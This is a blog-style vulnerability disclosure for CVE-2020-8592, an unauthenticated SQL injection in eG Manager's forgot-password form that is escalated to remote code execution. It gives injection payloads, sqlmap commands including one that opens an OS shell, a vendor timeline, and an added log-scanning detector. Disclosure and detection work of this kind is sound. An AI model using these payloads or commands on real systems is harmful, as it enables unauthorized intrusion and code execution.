SQL Injection leading to Remote Code Execution (CVE-2020-8592)
In this blog post I will show how to exploit a SQL injection vulnerability in the popular Java-based MaaS software "eG Manager" and how I escalated it to remote code execution.
The SQL injection vulnerability can be exploited by an unauthenticated attacker via the forgot password function. An attacker is able to execute stacked SQL queries, which means it is possible to manipulate arbitrary database entries and even execute shell commands.
"eG Manager" has a forgot password feature, and its input validation was missing. If the username specified is valid, the password is emailed to the user with that username; if not, the server shows 'username does not exist'. An attacker can exploit this feature by injecting stacked-query SQL syntax.
Exploiting SQL Injection to Remote Code Execution
In the "Forgot Password" area, there is an input box to confirm the user's identity. If an administrator forgets the login password, he/she can click the Forgot Password link. Doing so invokes a form in which the administrator has to provide the username for which the password is required and then click the "Get Password" button to retrieve the password.
eG Manager Forgot Password Area
If the user enters his/her username in the forgot password area, "eG Manager" searches for the username in the database. If the username exists, an email is sent to the valid mail address assigned to it in the database. I tested with Boolean-based SQL queries:
Payload: user=admin' and 1=1--+-
Response: You will receive your password by mail
Sending Boolean Based SQL Queries
Payload: admin' and 1=2--+-
Response: Username does not exist
Sending Boolean Based SQL Queries
I also tested with a stacked SQL query. The server responded after a 6 second delay.
Payload: test'; WAITFOR DELAY '0:0:5'--
Sending SQL Stacked Query
I used "sqlmap" for the further exploitation steps.
/usr/bin/sqlmap -u "https://targetIP:port/final/servlet/com.eg.LoginHelperServlet" --data="user=aa*" --dbms=mssql --technique=S --prefix="'" --suffix="--" --dbs -v 3
Exploiting SQL Injection
Since it was vulnerable to stacked-query SQL injection, it is possible to pwn the target system. I used the following "sqlmap" command to get a remote shell.
/usr/bin/sqlmap -u "https://targetIP:7077/final/servlet/com.eg.LoginHelperServlet" --data="user=aa*" --dbms=mssql --technique=S --prefix="'" --suffix="--" --os-shell -v 3
Remote Code Execution via SQL Injection
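As a detection-side addition that is not part of the original post: a small Python checker that reads a constructed request log for the forgot-password servlet, decodes the `user` field and flags the Boolean and stacked-query indicators seen in the payloads above. The log line format and the indicator list are my assumptions, not anything from eG Manager itself.

```python
import re
from urllib.parse import parse_qs

# Constructed sample request log (not from the original post), one request per
# line as "<method> <path> <url-encoded body>". Lines 2 and 3 carry the Boolean
# and WAITFOR payloads from the post; line 4 is a legitimate name with a quote.
SAMPLE_LOG = """\
POST /final/servlet/com.eg.LoginHelperServlet user=admin
POST /final/servlet/com.eg.LoginHelperServlet user=admin%27+and+1%3D1--%2B-
POST /final/servlet/com.eg.LoginHelperServlet user=test%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27--
POST /final/servlet/com.eg.LoginHelperServlet user=o%27brien
"""

# MSSQL-flavoured indicators, checked against the decoded `user` value.
INDICATORS = [
    ("time-delay", re.compile(r"\bWAITFOR\s+DELAY\b", re.I)),
    ("cmdshell", re.compile(r"\bxp_cmdshell\b", re.I)),
    ("stacked-query", re.compile(r";\s*(WAITFOR|EXEC|EXECUTE|SELECT|INSERT|UPDATE|DELETE|DROP|ALTER|DECLARE)\b", re.I)),
    ("tautology", re.compile(r"'\s*(AND|OR)\s+\d+\s*=\s*\d+", re.I)),
    ("comment-tail", re.compile(r"--\s*(\+-)?\s*$")),
]

def scan_request(line):
    """Return (decoded user value, [matched indicator labels]) for a POST to the
    forgot-password servlet, or None for any other log line."""
    try:
        method, path, body = line.split(" ", 2)
    except ValueError:
        return None
    if method != "POST" or not path.endswith("com.eg.LoginHelperServlet"):
        return None
    # parse_qs URL-decodes, so `+` and %xx become what the database would see.
    user = parse_qs(body, keep_blank_values=True).get("user", [""])[0]
    return user, [label for label, rx in INDICATORS if rx.search(user)]

def scan_log(text):
    """Return [(line number, decoded user value, labels)] for flagged requests."""
    findings = []
    for number, line in enumerate(text.splitlines(), 1):
        result = scan_request(line)
        if result and result[1]:
            findings.append((number, result[0], result[1]))
    return findings

if __name__ == "__main__":
    for number, user, labels in scan_log(SAMPLE_LOG):
        print(f"line {number}: {user!r} -> {', '.join(labels)}")
```

The root fix is a parameterized lookup of the username in the servlet; this checker only helps spot probes in request logs after the fact.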
2020/01/23 Vulnerability reported to eG Innovations, Inc.
2020/01/28 Vendor addressed the issue in 7.1.2
2020/01/29 Vendor fixed the issue and notified their customers.
In this post I analyzed a stacked-query SQL injection vulnerability in "eG Manager v7" which can be triggered through a JSP file. An attacker needs to know a username and can then inject arbitrary SQL commands. I found that it is possible to leverage the issue into remote code execution if the "eG Manager" database has the xp_cmdshell option enabled. However, if other databases are used, remote code execution might still be possible. I would like to thank the "eG Innovations, Inc" security team for the professional communication and for the very fast resolution of the issue.